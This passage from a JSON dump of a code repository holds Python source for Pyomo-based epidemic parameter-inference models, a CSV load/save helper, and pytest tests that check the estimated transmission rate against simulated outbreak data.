leaving the I1 compartment.\n gamma_2 : float\n the rate constant for leaving the I2 compartment.\n gamma_3 : float\n the rate constant for leaving the I3 compartment.\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n lse : bool\n If true, the activated objective corresponds to the least-squares, otherwise the \n likelihood objective will be activated.\n \"\"\"\n rdates, rcases = rcommon.reported_cases_from_cumulative(Cdates, cumulative_reported_cases)\n dates, T, S, E, I1, I2, I3, R = recond.reconstruct_states_deterministic_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cumulative_reported_cases,\n population=population,\n sigma=sigma,\n gamma=gamma_1/3,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n\n \"\"\"\n T, S, E, I1, I2, I3, R = compute_compartments_decay(cumulative_reported_cases=cumulative_reported_cases,\n population=population, sigma=sigma,\n gamma_1=gamma_1, gamma_2=gamma_2, gamma_3=gamma_3,\n report_delay=report_delay, reporting_factor=reporting_factor)\n \"\"\"\n\n if verbose: # pragma: no cover\n print('corrected case data being used:')\n print(T)\n \n model = pe.ConcreteModel()\n model.DATES = dates\n model.T_data = T\n model.S_data = S\n model.E_data = E\n model.I1_data = I1\n model.I2_data = I2\n model.I3_data = I3\n model.R_data = R\n\n # cache some parameters on the model\n model.N = population\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.report_delay = report_delay\n model.rep_fac = reporting_factor\n\n # define the set of times\n model.timesteps = [i for i in range(len(T))]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n\n start=0\n if analysis_window.get('days',None) is not None:\n start = max(start, len(model.timesteps)-analysis_window.get('days',None)-1)\n model.TIMES_m_obj = pe.Set(initialize=model.timesteps[start:], ordered=True)\n\n # define the parameters\n model.beta = pe.Var(initialize=1.3, bounds=(0,None)) # transmission parameter\n model.alpha = pe.Var(initialize=1.0)\n model.alpha.fix(1.0)\n\n # define the case count variables\n model.T_hat = pe.Var(model.TIMES, initialize=1.0)\n\n # infection process\n def _infection_process(m, t):\n return m.T_hat[t] == m.beta * (I1[t] + I2[t] + I3[t]) * S[t] / m.N\n model.infection_process = pe.Constraint(model.TIMES_m_obj, rule=_infection_process)\n\n # least squares objective function\n def _lse(m):\n return sum( (m.T_hat[t] - T[t])**2 for t in m.TIMES_m_obj)\n model.o_lse = pe.Objective(rule=_lse)\n\n def _like(m):\n return sum( T[t]/m.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / m.N)) for t in m.TIMES_m_obj if I1[t] + I2[t] + I3[t] > 0) + \\\n sum( (S[t]-T[t])/m.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / m.N)) for t in m.TIMES_m_obj)\n model.o_like = pe.Objective(rule=_like, sense=pe.maximize)\n\n if lse:\n model.o_like.deactivate()\n else:\n model.o_lse.deactivate()\n return model\n" }, { "alpha_fraction": 0.6105970144271851, "alphanum_fraction": 0.6247958540916443, "avg_line_length": 40.28089904785156, "blob_id": "ce7150a4be1fc6573c441c0ce87dc1e113ba8656", "content_id": "9a0982c72c2367f72108096d3210424587146f21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22044, "license_type": "no_license", "max_line_length": 176, "num_lines": 534, "path": "/epi_inference/formulations/attic/formulations.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#\n# THIS IS THE OLD FILE WITH FORMULATIONS\n#\n# These models have been moved to seperate files, except for the *delay*\n# formulations, which are not actively used.\n#\nimport pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import assert_optimal_termination\nimport math\n\nfrom ..tseir_utils import compute_compartments_time_delay, compute_compartments_decay\n\n\ndef run_multinode_decay_lsq(cm_rep_cases, population, sigma, gamma, deltaP, reporting_factor, verbose=False):\n assert sigma > 0\n assert gamma > 0\n assert deltaP > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_multinode_decay_lsq(\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n deltaP=deltaP, reporting_factor=reporting_factor,\n verbose=verbose\n )\n\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n #m.pprint()\n #m.display()\n\n return {'est_beta': value(m.beta)}\n\ndef run_decay_lsq(cm_rep_cases, population, sigma, gamma, deltaP, reporting_factor, verbose=False):\n assert sigma > 0\n assert gamma > 0\n assert deltaP > 0\n assert population > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_decay_lsq(\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n deltaP=deltaP, reporting_factor=reporting_factor,\n verbose=verbose\n )\n\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n\n return {'est_beta': value(m.beta)}\n\ndef run_decay_blike(cm_rep_cases, population, sigma, gamma, deltaP, reporting_factor, verbose=False):\n assert sigma > 0\n assert gamma > 0\n assert deltaP > 0\n assert population > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_decay_lsq(\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n deltaP=deltaP, reporting_factor=reporting_factor,\n verbose=verbose\n )\n\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n\n m.lse.deactivate()\n m.like.activate()\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status) \n\n return {'est_beta': value(m.beta)}\n\ndef run_delay_lsq(cm_rep_cases, population, deltaE, deltaI, deltaP, reporting_factor, verbose=False):\n assert deltaE > 0\n assert deltaI > 0\n assert deltaP > 0\n assert population > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_delay_lsq(\n cumulative_reported_cases=cm_rep_cases,\n population=population,\n deltaE=deltaE,\n deltaI=deltaI,\n deltaP=deltaP,\n reporting_factor=reporting_factor,\n verbose=verbose\n )\n \n solver = SolverFactory('ipopt')\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n return {'est_beta': value(m.beta)}\n\ndef run_delay_ln_lsq(cm_rep_cases, population, deltaE, deltaI, deltaP, reporting_factor, verbose=False):\n assert deltaE > 0\n assert deltaI > 0\n assert deltaP > 0\n assert population > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_delay_ln_lsq(\n cumulative_reported_cases=cm_rep_cases,\n population=population,\n deltaE=deltaE,\n deltaI=deltaI,\n deltaP=deltaP,\n reporting_factor=reporting_factor,\n verbose=verbose\n )\n \n solver = SolverFactory('ipopt')\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n return {'est_ln_beta': value(m.ln_beta),\n 'est_beta': math.exp(value(m.ln_beta))}\n\ndef create_inference_formulation_delay_ln_lsq(cumulative_reported_cases, population, deltaE, deltaI, deltaP, reporting_factor, verbose=False):\n \"\"\"Creates a one-step-ahead inference model based on time delays in\n each compartment. The model is written in terms of the\n ln-transform of the cases (not absolute)\n\n Parameters\n ----------\n cumulative_reported_cases : list of *new* cases reported in each time period\n population : the population of the node being considered\n deltaE : int\n the number of days in the exposed compartment\n deltaI : int\n the number of days in the infectious compartment\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n cases, S, E, I, R = compute_compartments_time_delay(cumulative_reported_cases, population, deltaE, deltaI, deltaP, reporting_factor)\n\n if verbose:\n print('corrected case data being used:')\n print(cases)\n \n\n model = pe.ConcreteModel()\n\n # cache some parameters on the model to make\n # reporting easier\n model.N = population # overall population\n model.deltaE = deltaE\n model.deltaI = deltaI\n model.deltaP = deltaP\n model.rep_fac = reporting_factor\n\n # define the set of times\n model.timesteps = [i for i in range(len(cases))]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n model.TIMES_m_one = pe.Set(initialize=model.timesteps[1:], ordered=True)\n\n # define the parameters\n model.ln_beta = pe.Var(initialize=math.log(1.3)) # transmission parameter\n model.alpha = pe.Var(initialize=1.0)\n model.alpha.fix(1.0)\n\n # define the case count variables\n model.ln_Chat = pe.Var(model.TIMES_m_one, initialize=1.0)\n\n # log of the infection process\n def _infection_process(m, t):\n if t == m.TIMES.last():\n return pe.Constraint.Skip\n if I[t]==0:\n # if there are no infectives today, I am getting no information about beta\n # with this equation - let ln_Chat be free\n if verbose:\n print(' *** No infectives at time ', t, 'skipping equation for ln_Chat[', t+1, ']')\n return pe.Constraint.Skip\n return m.ln_Chat[t+1] == m.ln_beta + m.alpha*math.log(I[t]) + math.log(S[t]) - math.log(model.N)\n model.infection_process = pe.Constraint(model.TIMES, rule=_infection_process)\n\n # least squares objective function\n def _lse(m):\n \"\"\"\n expr = 0\n for t in model.TIMES_m_one:\n if cases[t-1] > 0:\n # we have computed an ln_Chat at t\n if cases[t] == 0:\n # we computed a ln_Chat at t, but there are no cases in\n # the next timestep. Therefore, match a low number\n expr += (model.ln_Chat[t] - math.log(1e-8))**2\n else:\n # we computed a ln_Chat at t, and there are cases in\n # the next timestep. \n expr += (model.ln_Chat[t] - math.log(cases[t]))**2\n return expr\n \"\"\"\n \n expr = 0\n for t in model.TIMES_m_one:\n if cases[t] > 0:\n expr += (model.ln_Chat[t] - math.log(cases[t]))**2\n elif I[t-1] > 0: # There were cases to compute ln_Chat[t], but no cases now\n # we had cases before, but we do not now - need to think about the\n # value to include in the log below\n #print('TIMESTEP', t)\n expr += (model.ln_Chat[t] - math.log(0.75))**2\n return expr\n \n # TODO: Look above - instead of skipping, we may need to \"match beta\"\n# return sum( (model.ln_Chat[t] - math.log(cases[t]))**2 for t in model.TIMES_m_one if cases[t] > 0)\n# return sum( (model.ln_Chat[t] - math.log(cases[t]))**2 for t in model.TIMES_m_one)\n model.lse = pe.Objective(rule=_lse)\n model.lse.pprint()\n \n return model\n\n\ndef create_inference_formulation_delay_lsq(cumulative_reported_cases, population, deltaE, deltaI, deltaP, reporting_factor, verbose=False):\n \"\"\"Creates a one-step-ahead inference model based on time delays in\n each compartment. The model is written in terms of the\n absolute number of cases (not ln-transform)\n\n Parameters\n ----------\n cumulative_reported_cases : list of *new* cases reported in each time period\n population : the population of the node being considered\n deltaE : int\n the number of days in the exposed compartment\n deltaI : int\n the number of days in the infectious compartment\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n \"\"\"\n cases, S, E, I, R = compute_compartments_time_delay(cumulative_reported_cases, population, deltaE, deltaI, deltaP, reporting_factor)\n\n if verbose:\n print('corrected case data being used:')\n print(cases)\n \n model = pe.ConcreteModel()\n\n # cache some parameters on the model to make\n # reporting easier\n model.N = population # overall population\n model.deltaE = deltaE\n model.deltaI = deltaI\n model.deltaP = deltaP\n model.rep_fac = reporting_factor\n\n # define the set of times\n model.timesteps = [i for i in range(len(cases))]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n model.TIMES_m_one = pe.Set(initialize=model.timesteps[1:], ordered=True)\n\n # define the parameters\n model.beta = pe.Var(initialize=1.3) # transmission parameter\n model.alpha = pe.Var(initialize=1.0)\n model.alpha.fix(1.0)\n\n # define the case count variables\n model.Chat = pe.Var(model.TIMES_m_one, initialize=1.0)\n\n # log of the infection process\n def _infection_process(m, t):\n if t == m.TIMES.last():\n return pe.Constraint.Skip\n return m.Chat[t+1] == m.beta * I[t]*S[t]/model.N\n model.infection_process = pe.Constraint(model.TIMES, rule=_infection_process)\n\n # least squares objective function\n def _lse(m):\n return sum( (model.Chat[t] - cases[t])**2 for t in model.TIMES_m_one)\n# return sum( 1.0/max(cases[t]**2,1.0)*(model.Chat[t] - cases[t])**2 for t in model.TIMES_m_one)\n model.lse = pe.Objective(rule=_lse)\n\n return model\n\n\ndef create_inference_formulation_multinode_decay_lsq(cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, deltaP, reporting_factor, verbose=False):\n \"\"\"\n Creates a nonlinear one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n\n cumulative_reported_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n population : a dataframe with a single column that represents the\n population for different columns in cumulative_reported_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n model = pe.ConcreteModel()\n\n # Cached data\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.deltaP = deltaP\n model.reporting_factor = reporting_factor\n\n model.beta = pe.Var(initialize=1.3, bounds=(0,None)) # transmission parameter\n ## IS THIS AN ERROR?\n ##model.alpha = pe.Var(initialize=1.0)\n ##model.alpha.fix(1.0)\n\n model.A = pe.Set(initialize=[v for v in cumulative_reported_cases.keys().to_list()])\n\n def block_rule(B, nodeid):\n # Cached data\n B.N = population[int(nodeid)] # overall population\n\n cases, S, E, I1, I2, I3, R = compute_compartments_decay(cumulative_reported_cases=cumulative_reported_cases[nodeid],\n population=B.N,\n sigma=sigma,\n gamma_1=gamma_1, gamma_2=gamma_2, gamma_3=gamma_3,\n deltaP=deltaP, reporting_factor=reporting_factor)\n if verbose:\n print('corrected case data being used:')\n print(cases)\n\n # define the set of times\n B.timesteps = [i for i in range(len(cases))]\n B.TIMES = pe.Set(initialize=B.timesteps, ordered=True)\n B.TIMES_m_one = pe.Set(initialize=B.timesteps[1:], ordered=True)\n\n # define the case count variables\n B.Chat = pe.Var(B.TIMES_m_one, initialize=1.0)\n\n # infection process\n def _infection_process(b, t):\n if t == b.TIMES.last():\n return pe.Constraint.Skip\n return b.Chat[t+1] == model.beta * (I1[t] + I2[t] + I3[t]) * S[t] / b.N\n B.infection_process = pe.Constraint(B.TIMES, rule=_infection_process)\n\n # least squares objective function\n def _lse(b):\n return sum( (b.Chat[t] - cases[t])**2 for t in b.TIMES_m_one)\n B.lse = pe.Expression(rule=_lse)\n\n model.b = pe.Block(model.A, rule=block_rule)\n\n def _total_lse(m):\n return sum( m.b[a].lse for a in m.A )\n model.total_lse = pe.Objective(rule=_total_lse)\n\n ## likelihood objective function\n #def _like(m):\n # #return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one)\n # return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one)\n #model.like = pe.Objective(rule=_like, sense=pe.maximize)\n #model.like.deactivate()\n\n return model\n\ndef create_inference_formulation_decay_lsq(cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, deltaP, reporting_factor, verbose=False):\n \"\"\"\n Creates a nonlinear one-step-ahead inference model using a decay model with 3 I compartments. The model is written in terms of absolute numbers of cases (not ln-transform)\n\n Parameters\n ----------\n cumulative_reported_cases : list of *new* cases reported in each time period\n population : the population of the node being considered\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n cases, S, E, I1, I2, I3, R = compute_compartments_decay(cumulative_reported_cases=cumulative_reported_cases,\n population=population, sigma=sigma,\n gamma_1=gamma_1, gamma_2=gamma_2, gamma_3=gamma_3,\n deltaP=deltaP, reporting_factor=reporting_factor)\n\n if verbose:\n print('corrected case data being used:')\n print(cases)\n \n model = pe.ConcreteModel()\n\n # cache some parameters on the model to make\n # reporting easier\n model.N = population # overall population\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.deltaP = deltaP\n model.rep_fac = reporting_factor\n\n # define the set of times\n model.timesteps = [i for i in range(len(cases))]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n model.TIMES_m_one = pe.Set(initialize=model.timesteps[1:], ordered=True)\n\n # define the parameters\n model.beta = pe.Var(initialize=1.3, bounds=(0,None)) # transmission parameter\n model.alpha = pe.Var(initialize=1.0)\n model.alpha.fix(1.0)\n\n # define the case count variables\n model.Chat = pe.Var(model.TIMES_m_one, initialize=1.0)\n\n # infection process\n def _infection_process(m, t):\n if t == m.TIMES.last():\n return pe.Constraint.Skip\n return m.Chat[t+1] == m.beta * (I1[t] + I2[t] + I3[t]) * S[t] / model.N\n model.infection_process = pe.Constraint(model.TIMES, rule=_infection_process)\n\n # least squares objective function\n def _lse(m):\n return sum( (model.Chat[t] - cases[t])**2 for t in model.TIMES_m_one)\n model.lse = pe.Objective(rule=_lse)\n\n # likelihood objective function\n def _like(m):\n #return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one)\n return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one)\n model.like = pe.Objective(rule=_like, sense=pe.maximize)\n model.like.deactivate()\n\n return model\n\ndef create_inference_formulation_decay_blike(cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, deltaP, reporting_factor, verbose=False):\n \"\"\"\n Creates a nonlinear one-step-ahead inference model using a decay model with 3 I compartments. The model is written in terms of absolute numbers of cases (not ln-transform).\n This formulation uses a log-likelihood for the binomial distribution to estimate beta.\n\n Parameters\n ----------\n cumulative_reported_cases : list of *new* cases reported in each time period\n population : the population of the node being considered\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n cases, S, E, I1, I2, I3, R = compute_compartments_decay(cumulative_reported_cases=cumulative_reported_cases,\n population=population, sigma=sigma,\n gamma_1=gamma_1, gamma_2=gamma_2, gamma_3=gamma_3,\n deltaP=deltaP, reporting_factor=reporting_factor)\n\n if verbose:\n print('corrected case data being used:')\n print(cases)\n \n model = pe.ConcreteModel()\n\n # cache some parameters on the model to make\n # reporting easier\n model.N = population # overall population\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.deltaP = deltaP\n model.rep_fac = reporting_factor\n\n # define the set of times\n model.timesteps = [i for i in range(len(cases))]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n model.TIMES_m_one = pe.Set(initialize=model.timesteps[1:], ordered=True)\n\n # define the parameters\n model.beta = pe.Var(initialize=1.3, bounds=(0,None)) # transmission parameter\n model.alpha = pe.Var(initialize=1.0)\n model.alpha.fix(1.0)\n\n def _like(m):\n #return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one)\n return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one)\n model.like = pe.Objective(rule=_like, sense=pe.maximize)\n \n return model\n" }, { "alpha_fraction": 0.6035856604576111, "alphanum_fraction": 0.6035856604576111, "avg_line_length": 29.714284896850586, "blob_id": "23e2dc04a33fd0759c16d6045352a8856f3ad098", "content_id": "56807c548fb8a2bfac2aa192bbef2f1f36d6d935", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1506, "license_type": "no_license", "max_line_length": 94, "num_lines": 49, "path": "/epi_inference/collect/misc.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['load_collect', 'save_collect']\n\nimport os\nimport csv\nimport pandas as pd\n\n\ndef load_collect(input_csv):\n \"\"\"\n This function loads a CSV file containing results from the 'collect' workflow. The\n CSV data is assumed to have a 'Date' column.\n\n Parameters\n ----------\n input_csv : string\n File name of the CSV file\n\n Returns\n -------\n Pandas dataframe containing the data from the CSV file.\n \"\"\"\n try:\n assert(os.path.exists(input_csv))\n except: # pragma: no cover\n raise RuntimeError(\"load_collect: ERROR. Input file \"+input_csv+\" does not exist.\")\n return pd.read_csv(input_csv, index_col='Date')\n\n\ndef save_collect(output_csv, df, verbose, warnings):\n \"\"\"\n This function loads a CSV file containing results from the 'collect' workflow. The\n CSV data is assumed to have a 'Date' column.\n\n Parameters\n ----------\n input_csv : string\n File name of the CSV file\n\n Returns\n -------\n Pandas dataframe containing the data from the CSV file.\n \"\"\"\n filedir = os.path.dirname(output_csv)\n if filedir and not os.path.exists(filedir): # pragma: no cover\n os.makedirs(filedir)\n if verbose and os.path.exists(output_csv): # pragma: no cover\n warnings.append( \"WARNING: over-writing file \"+output_csv )\n print(\"Writing file: \"+output_csv)\n df.to_csv(output_csv, quoting=csv.QUOTE_NONNUMERIC)\n\n" }, { "alpha_fraction": 0.41717329621315, "alphanum_fraction": 0.45054715871810913, "avg_line_length": 39.910804748535156, "blob_id": "1721e88a0c5fa489cf2aaf777ec35d1d36ec8b58", "content_id": "c1b681e3a20460308247735740a03d236fd760c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23851, "license_type": "no_license", "max_line_length": 120, "num_lines": 583, "path": "/epi_inference/formulations/attic/tests/bad_formulations.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\n\nfrom epi_inference.simulation.simulation import simulate_discrete_seiiir_deterministic\nfrom epi_inference.util import roundall\nfrom epi_inference.formulations.decay_lsq import run_decay_lsq\nfrom epi_inference.formulations.decay_blike import run_decay_blike\n#from epi_inference.formulations.multinode_decay_lsq import run_multinode_decay_lsq\n#import matplotlib.pyplot as plt\n\n# Todo: Add tests for other formulations\n\ndef test_decay_lsq_standard():\n \"\"\"\n Test the decay inference using data from a simulation with the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n results = run_decay_lsq(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'])\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_lsq_analysis_window():\n \"\"\"\n Test the decay inference using data from a simulation with the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n results = run_decay_lsq(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window={'days':10},\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'])\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_lsq_nonunity_reporting_factor():\n # test with non-unity reporting factor\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n results = run_decay_lsq(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n analysis_window=dict(),\n report_delay=report_delay,\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'])\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_lsq_incorrect_reporting_factor():\n # test with incorrect reporting factor\n # here, we expect some error, especially with larger beta values (since the S/N\n # term is inaccurate)\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho_assumed = 2\n rho_actual = 8\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n for beta in [0.3, 0.4, 0.5, 0.75, 1.0, 1.25, 1.5]:\n Cdates,C,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho_actual, N=N,\n report_delay=report_delay,\n tx=tx)\n \n results = run_decay_lsq(cm_rep_cases=C,\n population=N,\n sigma=sigma,\n gamma=gamma,\n analysis_window=dict(),\n report_delay=report_delay,\n reporting_factor=rho_assumed,\n Cdates=Cdates\n )\n\n assert beta == pytest.approx(results['est_beta'],1e-2)\n assert results['status'] == 'ok'\n assert results['msg'] == 'Optimal solution found'\n\ndef test_decay_lsq_zero_data():\n # test that the status flags are correct when the solve does not set a value for beta\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 1\n\n # test the inference with no data\n zeroC = [0]*(tf+1)\n Cdates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=tf+1).to_pydatetime().tolist()\n results = run_decay_lsq(cm_rep_cases=zeroC,\n population=N,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=rho,\n Cdates=Cdates\n )\n\n assert results['est_beta'] is None\n assert results['status'] == 'stale'\n assert results['msg'] == 'Transmission parameter beta not solved (stale).'\n\ndef test_decay_blike_standard():\n \"\"\"\n Test the decay inference using data from a simulation with the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n rho = 1\n report_delay = 7\n tf = 25\n tx = [0]*tf\n tx[10] = 